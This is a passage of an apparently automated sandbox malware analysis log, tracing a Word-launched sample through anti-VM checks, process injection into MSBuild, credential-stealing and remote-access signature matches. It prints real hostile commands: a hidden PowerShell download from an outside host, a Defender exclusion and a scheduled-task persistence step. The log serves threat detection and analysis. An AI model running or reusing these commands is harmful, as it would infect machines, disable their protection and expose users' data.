Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: 00000014.00000002.985202832.0000000002890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 2360, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 676, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1248, type: MEMORYSTR
Source: explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.985202832.0000000002890000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.1032548773.0000000002891000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.985202832.0000000002890000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.1032548773.0000000002891000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2720 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1284 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 2544 Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 2544 Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 2544 Thread sleep time: -720000s >= -30000s
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 1484 Thread sleep time: -41226s >= -30000s
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 2452 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1448 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2476 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1224 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 808 Thread sleep count: 60 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1256 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1056 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1184 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 2868 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 672 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 672 Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 804 Thread sleep count: 8031 > 30
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 672 Thread sleep time: -660000s >= -30000s
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 412 Thread sleep time: -41226s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1796 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 236 Thread sleep count: 60 > 30
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 508 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 508 Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 508 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 152 Thread sleep time: -41226s >= -30000s
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 1224 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2876 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 852 Thread sleep count: 60 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\explorer.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\explorer.exe Thread delayed: delay time: 240000
Source: C:\Users\user\AppData\Roaming\explorer.exe Window / User API: threadDelayed 9399
Source: C:\Users\user\AppData\Roaming\explorer.exe Window / User API: threadDelayed 8031
Source: C:\Users\user\AppData\Roaming\explorer.exe Window / User API: threadDelayed 6595
Source: C:\Users\user\AppData\Roaming\explorer.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Roaming\explorer.exe Thread delayed: delay time: 41226
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: explorer.exe, 0000001D.00000002.1032548773.0000000002891000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VBOXDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 0000001D.00000002.1032548773.0000000002891000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: explorer.exe, 0000001D.00000002.1030166755.000000000087D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware_S
Source: explorer.exe, 0000001D.00000002.1030821479.00000000008E7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: explorer.exe, 0000001D.00000002.1032548773.0000000002891000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWARETSOFTWARE\Oracle\VirtualBox Guest Additions
Source: explorer.exe, 0000001D.00000002.1032548773.0000000002891000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\NSYSTEM\ControlSet001\Services\Disk\Enum
Source: explorer.exe, 0000001D.00000002.1032548773.0000000002891000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\explorer.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Roaming\explorer.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Injected file: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT was created by C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Windows\System32\notepad.exe Injected file: C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 414000
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 419000
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 54F000
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 552000
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 553000
Source: C:\Users\user\AppData\Roaming\explorer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: FFFDE008
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -sta -noni -w hidden -executionpolicy bypass -nologo -command "(new-object system.net.webclient).downloadfile('http://login.929389.ankura.us/awogyiwg/explorer.exe','c:\users\user\appdata\roaming\explorer.exe')
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpE14B.tmp
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmp6336.tmp
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpFA37.tmp
Source: MSBuild.exe, 00000011.00000002.1264622743.00000000006A2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: MSBuild.exe, 00000011.00000002.1264622743.00000000006A2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: t Program Manager
Source: MSBuild.exe, 00000011.00000002.1264622743.00000000006A2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: J Program Managerr_
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10
Source: explorer.exe, 00000014.00000002.994309984.0000000005DA9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: procdump.exe

Stealing of Sensitive Information

Source: Yara match File source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 2360, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 2040, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 676, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1248, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY